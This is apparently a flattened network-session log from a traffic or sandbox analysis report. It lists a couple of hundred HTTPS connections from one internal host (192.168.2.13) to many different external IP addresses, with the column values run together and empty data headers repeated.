                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14319192.168.2.1350806191.30.253.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14320192.168.2.1357190221.207.77.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14321192.168.2.134492471.160.30.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14322192.168.2.1355176220.51.8.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14323192.168.2.1335580109.223.175.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14324192.168.2.133392865.14.65.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14325192.168.2.135492487.125.119.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14326192.168.2.1334500183.209.253.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14327192.168.2.1352366223.68.35.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14328192.168.2.135068651.234.84.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14329192.168.2.136043280.27.123.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14330192.168.2.1353256148.62.115.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14331192.168.2.1358196211.80.218.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14332192.168.2.136025854.8.192.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14333192.168.2.134240035.239.131.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14334192.168.2.133747487.205.50.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14335192.168.2.1335680148.153.127.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14336192.168.2.13417805.138.149.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14337192.168.2.1348470103.103.114.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14338192.168.2.1346120121.227.41.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14339192.168.2.134561695.7.132.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14340192.168.2.1340028219.221.172.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14341192.168.2.1357324109.133.164.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14342192.168.2.1354490152.39.61.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14343192.168.2.1358716206.154.119.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14344192.168.2.1345178131.37.21.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14345192.168.2.1356120167.154.135.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14346192.168.2.1355662169.190.111.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14347192.168.2.134014245.98.149.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14348192.168.2.1336654159.250.133.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14349192.168.2.1359040178.157.115.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14350192.168.2.1345222197.30.67.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14351192.168.2.134654850.18.117.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14352192.168.2.1352806172.163.10.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14353192.168.2.134934234.87.78.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14354192.168.2.1334886152.89.239.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14355192.168.2.13497862.243.62.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14356192.168.2.135132223.69.123.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14357192.168.2.135866663.32.157.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14358192.168.2.135239094.57.123.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14359192.168.2.136045020.52.144.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14360192.168.2.1336472146.159.108.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14361192.168.2.1344028163.193.95.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14362192.168.2.134296650.91.169.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14363192.168.2.134080045.226.241.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14364192.168.2.1338132111.64.252.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14365192.168.2.134316284.119.24.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14366192.168.2.1357612219.19.205.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14367192.168.2.1335040109.151.90.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14368192.168.2.1348152144.33.73.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14369192.168.2.135959281.94.126.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14370192.168.2.1352204122.248.116.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14371192.168.2.1333992138.39.158.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14372192.168.2.134647473.63.158.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14373192.168.2.134388851.171.190.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14374192.168.2.133869040.235.33.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14375192.168.2.1343500192.243.74.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14376192.168.2.135363831.54.235.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14377192.168.2.135871488.31.214.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14378192.168.2.135821864.125.64.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14379192.168.2.135815635.21.227.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14380192.168.2.134733291.240.215.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14381192.168.2.13424861.96.42.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14382192.168.2.1352982173.142.251.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14383192.168.2.133439081.247.103.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14384192.168.2.1351018149.179.137.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14385192.168.2.134129220.146.16.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14386192.168.2.1360904201.250.155.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14387192.168.2.1360572179.50.221.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14388192.168.2.135150478.82.57.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14389192.168.2.136011461.195.54.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14390192.168.2.1338734108.139.231.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14391192.168.2.135255424.50.150.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14392192.168.2.1333738133.1.83.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14393192.168.2.1349768141.214.96.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14394192.168.2.1343958193.233.246.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14395192.168.2.134939278.129.199.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14396192.168.2.1339760104.155.176.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14397192.168.2.135442882.140.3.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14398192.168.2.1335770133.8.60.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14399192.168.2.135133087.38.206.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14400192.168.2.1352350206.16.187.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14401192.168.2.135099239.209.8.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14402192.168.2.134530045.15.0.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14403192.168.2.1359550105.95.228.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14404192.168.2.1350710218.209.87.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14405192.168.2.1343662159.38.16.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14406192.168.2.1345138166.38.13.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14407192.168.2.1355294109.69.201.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14408192.168.2.134258644.235.218.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14409192.168.2.1348502174.139.240.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14410192.168.2.1358200131.130.104.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14411192.168.2.1357122191.89.183.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14412192.168.2.1340186189.33.205.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14413192.168.2.1350616104.217.39.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14414192.168.2.1340616128.209.235.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14415192.168.2.135130063.244.158.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14416192.168.2.1359992106.255.187.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14417192.168.2.135897214.192.251.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14418192.168.2.1341730134.52.13.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14419192.168.2.134951490.32.216.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14420192.168.2.1355256209.124.249.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14421192.168.2.1335746158.129.146.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14422192.168.2.1337344216.203.46.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14423192.168.2.13344349.31.118.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14424192.168.2.13450129.132.203.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14425192.168.2.1334302207.40.148.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14426192.168.2.134081493.57.246.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14427192.168.2.133978458.202.80.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14428192.168.2.1345594100.184.204.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14429192.168.2.135864652.229.31.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14430192.168.2.134615660.18.54.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14431192.168.2.1360744205.173.163.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14432192.168.2.1354876193.248.221.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14433192.168.2.135608484.162.206.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14434192.168.2.1360994121.220.205.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14435192.168.2.134672466.20.106.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14436192.168.2.1335270210.98.248.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14437192.168.2.1336890104.89.31.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14438192.168.2.1352544180.102.173.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14439192.168.2.1336744186.104.185.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14440192.168.2.135962278.206.41.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14441192.168.2.1351380184.200.103.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14442192.168.2.1356462191.36.159.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14443192.168.2.1335274205.148.242.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14444192.168.2.135725279.15.42.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14445192.168.2.1358600149.168.125.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14446192.168.2.133545265.133.15.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14447192.168.2.1344722150.225.143.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14448192.168.2.1334722133.121.0.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14449192.168.2.135264891.16.212.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14450192.168.2.134470693.71.21.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14451192.168.2.1342536178.170.165.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14452192.168.2.1359498126.115.94.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14453192.168.2.134387085.228.184.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14454192.168.2.133767479.82.190.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14455192.168.2.1343358187.239.95.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14456192.168.2.133510254.137.236.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14457192.168.2.134249468.18.218.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14458192.168.2.133695282.110.112.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14459192.168.2.134386276.161.84.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14460192.168.2.1344474120.33.53.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14461192.168.2.135889466.9.26.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14462192.168.2.134217268.245.233.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14463192.168.2.1345444104.203.133.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14464192.168.2.1345462210.52.51.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14465192.168.2.1358612119.36.101.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14466192.168.2.133305419.211.34.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14467192.168.2.1337714139.127.199.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14468192.168.2.1353984185.175.223.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14469192.168.2.1356080216.192.88.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14470192.168.2.135460657.23.51.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14471192.168.2.134627267.241.9.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14472192.168.2.1351400219.75.37.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14473192.168.2.1359878157.87.240.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14474192.168.2.1347810149.36.142.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14475192.168.2.133620458.56.199.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14476192.168.2.1360838153.206.141.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14477192.168.2.135730459.186.135.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14478192.168.2.134025297.245.93.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14479192.168.2.1350680199.41.244.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14480192.168.2.135523698.240.46.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14481192.168.2.1338310179.95.81.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14482192.168.2.133502283.150.233.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14483192.168.2.134265663.241.57.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14484192.168.2.1352096100.15.26.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14485192.168.2.1348700119.75.183.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14486192.168.2.134543679.46.46.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14487192.168.2.1336426221.43.20.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14488192.168.2.135872498.32.245.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14489192.168.2.1360994125.225.207.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14490192.168.2.135947467.222.28.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14491192.168.2.1337786136.83.175.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14492192.168.2.135271682.73.8.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14493192.168.2.1356552202.88.239.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14494192.168.2.13557421.240.189.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14495192.168.2.134023287.156.188.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14496192.168.2.13459402.150.98.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14497192.168.2.1348864173.14.14.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14498192.168.2.134155685.145.69.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14499192.168.2.1360584216.147.40.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14500192.168.2.1344540203.207.160.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14501192.168.2.1353176203.105.103.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14502192.168.2.133812475.68.212.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14503192.168.2.1336814111.57.62.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14504192.168.2.1336742137.46.135.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14505192.168.2.135361047.145.56.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14506192.168.2.1333178176.162.255.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14507192.168.2.1336468201.129.20.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14508192.168.2.1334020170.38.147.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14509192.168.2.135080268.208.198.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14510192.168.2.1333792143.175.152.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14511192.168.2.135773272.187.62.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14512192.168.2.1342980121.95.160.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14513192.168.2.1351290167.13.66.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14514192.168.2.135147462.168.4.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14515192.168.2.1346262189.197.197.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14516192.168.2.133998492.234.121.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14517192.168.2.133750496.207.20.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14518192.168.2.13504985.187.31.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14519192.168.2.1355984193.105.227.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14520192.168.2.13602909.7.250.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14521192.168.2.1356630192.82.93.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14522192.168.2.1337406182.111.11.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14523192.168.2.1359946117.149.243.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14524192.168.2.1340660108.86.79.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14525192.168.2.134490249.63.224.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14526192.168.2.1357160185.214.17.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14527192.168.2.135671641.155.143.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14528192.168.2.1357722107.69.244.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14529192.168.2.134505258.213.11.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14530192.168.2.1359370219.60.64.35443
                                                  TimestampBytes transferredDirectionData


